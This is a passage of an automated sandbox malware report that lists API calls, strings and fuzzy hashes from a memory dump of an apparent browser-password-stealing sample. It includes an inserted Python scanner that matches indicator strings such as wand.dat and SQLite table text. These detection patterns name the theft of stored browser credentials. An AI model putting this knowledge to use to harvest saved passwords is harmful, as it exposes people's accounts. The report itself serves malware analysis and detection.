                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AE3C
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AE4F
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AE62
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040AE75
                                                                                                                                                    • free.MSVCRT(00000000), ref: 0040AEAE
                                                                                                                                                      • Part of subcall function 00408037: free.MSVCRT(00000000,00408352,00000000,?,00000000), ref: 0040803E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                    • Opcode ID: 1ee9c0bd248601916a1146cb301d571c7104734ae8e82a7a1079c5bd7d19b95f
                                                                                                                                                    • Instruction ID: 5cedf5899733f7fd452d28a3e5974aab2a3b061775a7969347507653aae84efd
                                                                                                                                                    • Opcode Fuzzy Hash: 1ee9c0bd248601916a1146cb301d571c7104734ae8e82a7a1079c5bd7d19b95f
                                                                                                                                                    • Instruction Fuzzy Hash: 13010832946A20ABC6367B2AD50251FB368BE91B90306457FF445BB3818F3C7C5186DF
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • AreFileApisANSI.KERNEL32 ref: 00414CC6
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00414CE6
                                                                                                                                                    • malloc.MSVCRT ref: 00414CEC
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 00414D0A
                                                                                                                                                    • free.MSVCRT(?), ref: 00414D13
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4053608372-0
                                                                                                                                                    • Opcode ID: 812cbb7add7f674ff0468623c6e7b50f355b1e49695ec4f29896983211f76786
                                                                                                                                                    • Instruction ID: 44ea64674f021cea2031e16b60495934b5371f4db2927085d3abb6a650cf4446
                                                                                                                                                    • Opcode Fuzzy Hash: 812cbb7add7f674ff0468623c6e7b50f355b1e49695ec4f29896983211f76786
                                                                                                                                                    • Instruction Fuzzy Hash: 6601F4B140011DBEAF115FA9DCC5CAF7EACDA457E8720036AF810E2190E6344E4056B8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32(?), ref: 0040A314
                                                                                                                                                    • GetWindowRect.USER32 ref: 0040A321
                                                                                                                                                    • GetClientRect.USER32 ref: 0040A32C
                                                                                                                                                    • MapWindowPoints.USER32 ref: 0040A33C
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040A358
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                    • Opcode ID: 08c57ff735731e7da7a27fa3f9b2ad0737e344cc782b350b7b638dd860d33b4b
                                                                                                                                                    • Instruction ID: 816d64d46c4b910dad83cc5cff1f19606824cbaca0e9d5d20ff5cebd8420fa85
                                                                                                                                                    • Opcode Fuzzy Hash: 08c57ff735731e7da7a27fa3f9b2ad0737e344cc782b350b7b638dd860d33b4b
                                                                                                                                                    • Instruction Fuzzy Hash: 06014836800129BBDB11AFA59C49EFFBFBCFF46B15F044169F901A2190D77896028BA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000000,00410671,?,?), ref: 00442202
                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00442216
                                                                                                                                                    • memset.MSVCRT ref: 00442225
                                                                                                                                                      • Part of subcall function 00407B93: ReadFile.KERNELBASE(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00442248
                                                                                                                                                      • Part of subcall function 00441FDC: memchr.MSVCRT ref: 00442017
                                                                                                                                                      • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420BB
                                                                                                                                                      • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420CD
                                                                                                                                                      • Part of subcall function 00441FDC: memcpy.MSVCRT ref: 004420F5
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0044224F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1471605966-0
                                                                                                                                                    • Opcode ID: b598463014c614ebe371b6abc587b169cc581dfa21e6606e22753a0b647566d4
                                                                                                                                                    • Instruction ID: 5cd116c641245c85bcd5bad65d9d69835b0888748ca48550e443bbafd66aa86b
                                                                                                                                                    • Opcode Fuzzy Hash: b598463014c614ebe371b6abc587b169cc581dfa21e6606e22753a0b647566d4
                                                                                                                                                    • Instruction Fuzzy Hash: 3DF0FC325041007AE21077329D4AF6B7B9CDF85761F10053FF515911D2EA789904C179
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                    • Opcode ID: 71da32900e05e7392b15d97de4efa56f9abc2cc5c2514c7a65295a7a2cc172a2
                                                                                                                                                    • Instruction ID: 7485fa72425b52f9fdb5b203d173836123891f19866e380edd82503d68adac07
                                                                                                                                                    • Opcode Fuzzy Hash: 71da32900e05e7392b15d97de4efa56f9abc2cc5c2514c7a65295a7a2cc172a2
                                                                                                                                                    • Instruction Fuzzy Hash: D8F0FF72509701AFD720AF6999D991BB7F9BF943147A0493FF049D3A41CB78A8904A18
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040C37F
• memset.MSVCRT ref: 0040C396
  • Part of subcall function 0040B9C3: wcscpy.MSVCRT ref: 0040B9C8
  • Part of subcall function 0040B9C3: _wcslwr.MSVCRT ref: 0040BA03
• _snwprintf.MSVCRT ref: 0040C3C5
  • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
  • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$FileWrite_snwprintf_wcslwrwcscpywcslen
• String ID: </%s>
• API String ID: 168708657-259020660
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 004075AD: memset.MSVCRT ref: 004075B7
  • Part of subcall function 004075AD: wcscpy.MSVCRT ref: 004075F7
• CreateFontIndirectW.GDI32(?), ref: 0040105D
• SendDlgItemMessageW.USER32 ref: 0040107C
• SendDlgItemMessageW.USER32 ref: 0040109A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: ClassName_wcsicmpmemset
• String ID: edit
• API String ID: 2747424523-2167791130
Uniqueness

Uniqueness Score: -1.00%

APIs
• LoadLibraryW.KERNEL32(shell32.dll,0040E314,00000000,?,00000002), ref: 004121D1
• GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 004121E6
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: AddressLibraryLoadProc
• String ID: SHGetSpecialFolderPathW$shell32.dll
• API String ID: 2574300362-880857682
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memcpy$memcmp
• String ID:
• API String ID: 3384217055-0
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$memcpy
• String ID:
• API String ID: 368790112-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 004154B8
• memset.MSVCRT ref: 004154E8
  • Part of subcall function 0041538D: memset.MSVCRT ref: 004153AA
  • Part of subcall function 0041538D: UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 004153CA
  • Part of subcall function 00414EFE: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414F2A
  • Part of subcall function 00414EFE: SetEndOfFile.KERNEL32(?), ref: 00414F54
  • Part of subcall function 00414EFE: GetLastError.KERNEL32 ref: 00414F5E
Strings
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: memset$File$ErrorLastUnlockUnothrow_t@std@@@__ehfuncinfo$??2@
• String ID: %s-shm$,A
• API String ID: 1271386063-2158068007
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004158E7
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 00415912
• GetLastError.KERNEL32 ref: 00415939
• CloseHandle.KERNEL32(00000000), ref: 0041594F
Memory Dump Source
• Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateErrorHandleLastMappingView
• String ID:
• API String ID: 1661045500-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004132EA: memset.MSVCRT ref: 00413304
                                                                                                                                                    • memcpy.MSVCRT ref: 0042C42D
                                                                                                                                                    Strings
                                                                                                                                                    • virtual tables may not be altered, xrefs: 0042C384
                                                                                                                                                    • sqlite_altertab_%s, xrefs: 0042C3FE
                                                                                                                                                    • Cannot add a column to a view, xrefs: 0042C39A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                    • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                                                                                    • API String ID: 1297977491-2063813899
                                                                                                                                                    • Opcode ID: 73f7123a41afc254934908830e0006766df9d40b851d17961e81b3466ae4c6b7
                                                                                                                                                    • Instruction ID: 3e8a37011c5d834ac6e6d4f8fd11fd3d4e87e0ccd438cada7bf19ffd6667b676
                                                                                                                                                    • Opcode Fuzzy Hash: 73f7123a41afc254934908830e0006766df9d40b851d17961e81b3466ae4c6b7
                                                                                                                                                    • Instruction Fuzzy Hash: 03419D71A00615AFDB10DF69D881A5EB7F0FF08314F24856BE8489B352D778EA51CB88
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: $, $CREATE TABLE
                                                                                                                                                    • API String ID: 3510742995-3459038510
                                                                                                                                                    • Opcode ID: 9c967c3a06afb765e02c907f2e49235dd04f948cd2abf78a2709aa5cc33f4167
                                                                                                                                                    • Instruction ID: 75c0c8dac0447bb43292008ef446c40d7ab48a9469891862f1914eead86e2b05
                                                                                                                                                    • Opcode Fuzzy Hash: 9c967c3a06afb765e02c907f2e49235dd04f948cd2abf78a2709aa5cc33f4167
                                                                                                                                                    • Instruction Fuzzy Hash: C3518171E00219DFCF10DF9AD4856AEB7B5FF44309F64809BE841AB205D778AA45CB98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004047A1
                                                                                                                                                      • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
                                                                                                                                                      • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
                                                                                                                                                      • Part of subcall function 00409FF5: memcpy.MSVCRT ref: 0040A10D
                                                                                                                                                      • Part of subcall function 00409FF5: wcscpy.MSVCRT ref: 0040A076
                                                                                                                                                      • Part of subcall function 00409FF5: wcslen.MSVCRT ref: 0040A094
                                                                                                                                                      • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A0A2
                                                                                                                                                      • Part of subcall function 00407CFE: memset.MSVCRT ref: 00407D1F
                                                                                                                                                      • Part of subcall function 00407CFE: _snwprintf.MSVCRT ref: 00407D52
                                                                                                                                                      • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D5E
                                                                                                                                                      • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D76
                                                                                                                                                      • Part of subcall function 00407CFE: wcslen.MSVCRT ref: 00407D84
                                                                                                                                                      • Part of subcall function 00407CFE: memcpy.MSVCRT ref: 00407D97
                                                                                                                                                      • Part of subcall function 00407AB6: GetOpenFileNameW.COMDLG32(?), ref: 00407AFF
                                                                                                                                                      • Part of subcall function 00407AB6: wcscpy.MSVCRT ref: 00407B0D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$FileLoadNameOpenString_snwprintf
                                                                                                                                                    • String ID: *.*$dat$wand.dat
                                                                                                                                                    • API String ID: 3589925243-1828844352
                                                                                                                                                    • Opcode ID: ee95740454303ceeab932a838ec3e971a5e4e933b383f4235399895267209d19
                                                                                                                                                    • Instruction ID: 6d0f55f818233349c8d1636aac4371a0276c995c789a620d4a51b657e5e4e923
                                                                                                                                                    • Opcode Fuzzy Hash: ee95740454303ceeab932a838ec3e971a5e4e933b383f4235399895267209d19
                                                                                                                                                    • Instruction Fuzzy Hash: 6F419971A04206AFDB14EF61D885AAE77B4FF40314F10C42BFA05A71C2EF79A9958BD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

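The three function summaries above that carry strings (the SQLite alter-table messages cross-referenced at 0042C384, 0042C39A and 0042C3FE, the CREATE TABLE literal, and *.* / wand.dat reached through wcslen, wcscpy and GetOpenFileNameW) are the string-level evidence behind the report's browser-information-harvesting signature. The Python below is an added example, not code from the Joe Sandbox report or from the analysed sample: it scans a raw image-based dump for those same literals in both narrow and UTF-16LE form, maps each hit to a virtual address using the "Offset: 00400000, based on PE: true" convention of the Memory Dump Source lines, rebuilds the report's $-joined String ID field, and gives a coarse verdict. The dump bytes it runs on are constructed here and are not the report's .sdmp; the family names (opera_wand, sqlite_engine) and the verdict labels are the example's own, and the numeric API String ID hash is not reproduced.

```python
"""Scan a raw memory dump for the credential-theft string indicators listed in
the function blocks above. Added example; not code from the Joe Sandbox report
or from the analysed sample."""
import re
from dataclasses import dataclass

# Literals copied from this page's function summaries (process 14, dump based
# at VA 0x400000), grouped the way an analyst reads them: the Opera password
# store filename reached through wcs*/W-suffixed APIs, and SQLite engine text.
# The bare "dat" fragment from the wand.dat block's String ID is left out as
# too short to be discriminating. Family names are this example's own.
INDICATORS: dict[str, list[str]] = {
    "opera_wand": ["wand.dat", "*.*"],
    "sqlite_engine": [
        "sqlite_altertab_%s",
        "Cannot add a column to a view",
        "virtual tables may not be altered",
        "CREATE TABLE",
    ],
}

# Both encodings are tried for every literal: the W-API code path stores
# wide strings, while SQLite's error text is narrow.
ENCODINGS = ("ascii", "utf-16le")


@dataclass(frozen=True)
class Hit:
    family: str
    needle: str
    encoding: str
    offset: int  # byte offset into the dump
    va: int      # virtual address, assuming an image-based dump at `base`


def scan_dump(data: bytes, base: int = 0x400000) -> list[Hit]:
    """Return every indicator occurrence in `data`, ordered by offset."""
    hits: list[Hit] = []
    for family, needles in INDICATORS.items():
        for needle in needles:
            for enc in ENCODINGS:
                pattern = re.escape(needle.encode(enc))
                for m in re.finditer(pattern, data):
                    hits.append(Hit(family, needle, enc, m.start(), base + m.start()))
    return sorted(hits, key=lambda h: (h.offset, h.needle))


def string_id(hits: list[Hit], family: str) -> str:
    """Rebuild the report's 'String ID' text for one family: unique strings,
    sorted, joined with '$' (the joiner visible in the blocks above)."""
    return "$".join(sorted({h.needle for h in hits if h.family == family}))


def classify(hits: list[Hit]) -> str:
    """Coarse verdict: both families together match the browser-password
    recovery behaviour the report flags; one alone is only a partial signal."""
    families = {h.family for h in hits}
    if {"opera_wand", "sqlite_engine"} <= families:
        return "browser-credential-harvester"
    if families:
        return "partial:" + ",".join(sorted(families))
    return "none"


def build_sample_dump() -> bytes:
    """Constructed stand-in for the .sdmp (NOT the report's dump): NOP padding
    with a few of the page's literals embedded, nul-terminated as in an image."""
    pad = b"\x90" * 64
    return (
        pad
        + b"sqlite_altertab_%s\x00" + pad
        + "wand.dat".encode("utf-16le") + b"\x00\x00" + pad
        + b"Cannot add a column to a view\x00" + pad
        + "*.*".encode("utf-16le") + b"\x00\x00" + pad
        + b"CREATE TABLE\x00"
    )


if __name__ == "__main__":
    sample = build_sample_dump()  # real use: open("<dump>.sdmp", "rb").read()
    found = scan_dump(sample)
    for h in found:
        print(f"{h.va:08X} {h.family:14s} {h.encoding:9s} {h.needle!r}")
    print("String ID (sqlite_engine):", string_id(found, "sqlite_engine"))
    print("verdict:", classify(found))
```

Against the real dump, read the .sdmp as bytes and pass it to scan_dump. The VAs it reports are where the literals themselves live, which is not the same as the xrefs the plugin lists (those are the instructions that reference the strings), so expect nearby but different addresses.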
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0040B1B3: ??2@YAPAXI@Z.MSVCRT ref: 0040B1D4
                                                                                                                                                      • Part of subcall function 0040B1B3: ??3@YAXPAX@Z.MSVCRT ref: 0040B29B
                                                                                                                                                    • wcslen.MSVCRT ref: 0040CBEF
                                                                                                                                                    • _wtoi.MSVCRT ref: 0040CBFB
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040CC49
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040CC5A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1549203181-0
                                                                                                                                                    • Opcode ID: 567ae35796e479033978641934fe8efa79e81af9abf3b8ba23fb9af2cd80c235
                                                                                                                                                    • Instruction ID: 2e88af878a7a0ebae712eab1be6a0374a06ab0ac9bbd2c3eb3becf244d067ed8
                                                                                                                                                    • Opcode Fuzzy Hash: 567ae35796e479033978641934fe8efa79e81af9abf3b8ba23fb9af2cd80c235
                                                                                                                                                    • Instruction Fuzzy Hash: C3416D31900204EBEF21DF59C5C4A9DBBB4EF45319F1546BAEC09EB3A6D638D940CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memcpy
                                                                                                                                                    • String ID: @|=D
                                                                                                                                                    • API String ID: 3510742995-4242725666
                                                                                                                                                    • Opcode ID: df00fe4d456d847bcc816d9924c913a63d4017986857a83741e135789728a0a6
                                                                                                                                                    • Instruction ID: e04d1c669876fac24280ac48723ffca9e388da4b41f072ca806e7767fffd92f4
                                                                                                                                                    • Opcode Fuzzy Hash: df00fe4d456d847bcc816d9924c913a63d4017986857a83741e135789728a0a6
                                                                                                                                                    • Instruction Fuzzy Hash: 19113BF29003047BDB348E66DC84C5A77A8EB603987000E3EF90696291F675DF69C6D8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset
                                                                                                                                                    • String ID: -+A$-+A$Y,A
                                                                                                                                                    • API String ID: 2221118986-4154596189
                                                                                                                                                    • Opcode ID: e10b50a88832c8eca0fe984cc6704273a4110daab6733b6ac7d2fab50901f5f0
                                                                                                                                                    • Instruction ID: 1dfdef816599cc938eba6c7f1cf8632c899ce6bbbbec6bb0dc4dd89a5a59c02f
                                                                                                                                                    • Opcode Fuzzy Hash: e10b50a88832c8eca0fe984cc6704273a4110daab6733b6ac7d2fab50901f5f0
                                                                                                                                                    • Instruction Fuzzy Hash: 482156799417008FD3268F0AFE0565AB7E5FBE2702724413FE201D62B2D7B4489A8F8C
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                    • Opcode ID: af55a290a049585f4a789644ebda92ab2dfba96c6af2a809d8ac02bd9773f267
                                                                                                                                                    • Instruction ID: d20edd04bd2483e58964879576c48f2ebc5a647496c0cba51e85d391a6ad2c86
                                                                                                                                                    • Opcode Fuzzy Hash: af55a290a049585f4a789644ebda92ab2dfba96c6af2a809d8ac02bd9773f267
                                                                                                                                                    • Instruction Fuzzy Hash: 0D118C71204601AFD328DF2DCA91A26F7E5FFD8340B60892EE4DAC7385EA75E801CB14
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 00411ABC
                                                                                                                                                      • Part of subcall function 00407BF7: _snwprintf.MSVCRT ref: 00407C3C
                                                                                                                                                      • Part of subcall function 00407BF7: memcpy.MSVCRT ref: 00407C4C
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00411AE5
                                                                                                                                                    • memset.MSVCRT ref: 00411AEF
                                                                                                                                                    • GetPrivateProfileStringW.KERNEL32 ref: 00411B11
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1127616056-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• SHGetMalloc.SHELL32(?), ref: 004123DC
• SHBrowseForFolderW.SHELL32(?), ref: 0041240E
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00412422
• wcscpy.MSVCRT ref: 00412435
Similarity
• API ID: BrowseFolderFromListMallocPathwcscpy
• String ID:
• API String ID: 3917621476-0
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Similarity
• API ID: memcpy$memset
• String ID: sqlite_master
• API String ID: 438689982-3163232059
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00409FF5: GetModuleHandleW.KERNEL32(00000000,?,?,0040B09A,?,0040E241,00000000,00000000,?), ref: 0040A034
  • Part of subcall function 00409FF5: LoadStringW.USER32(00000000,00000007,00000FFF,?), ref: 0040A0CD
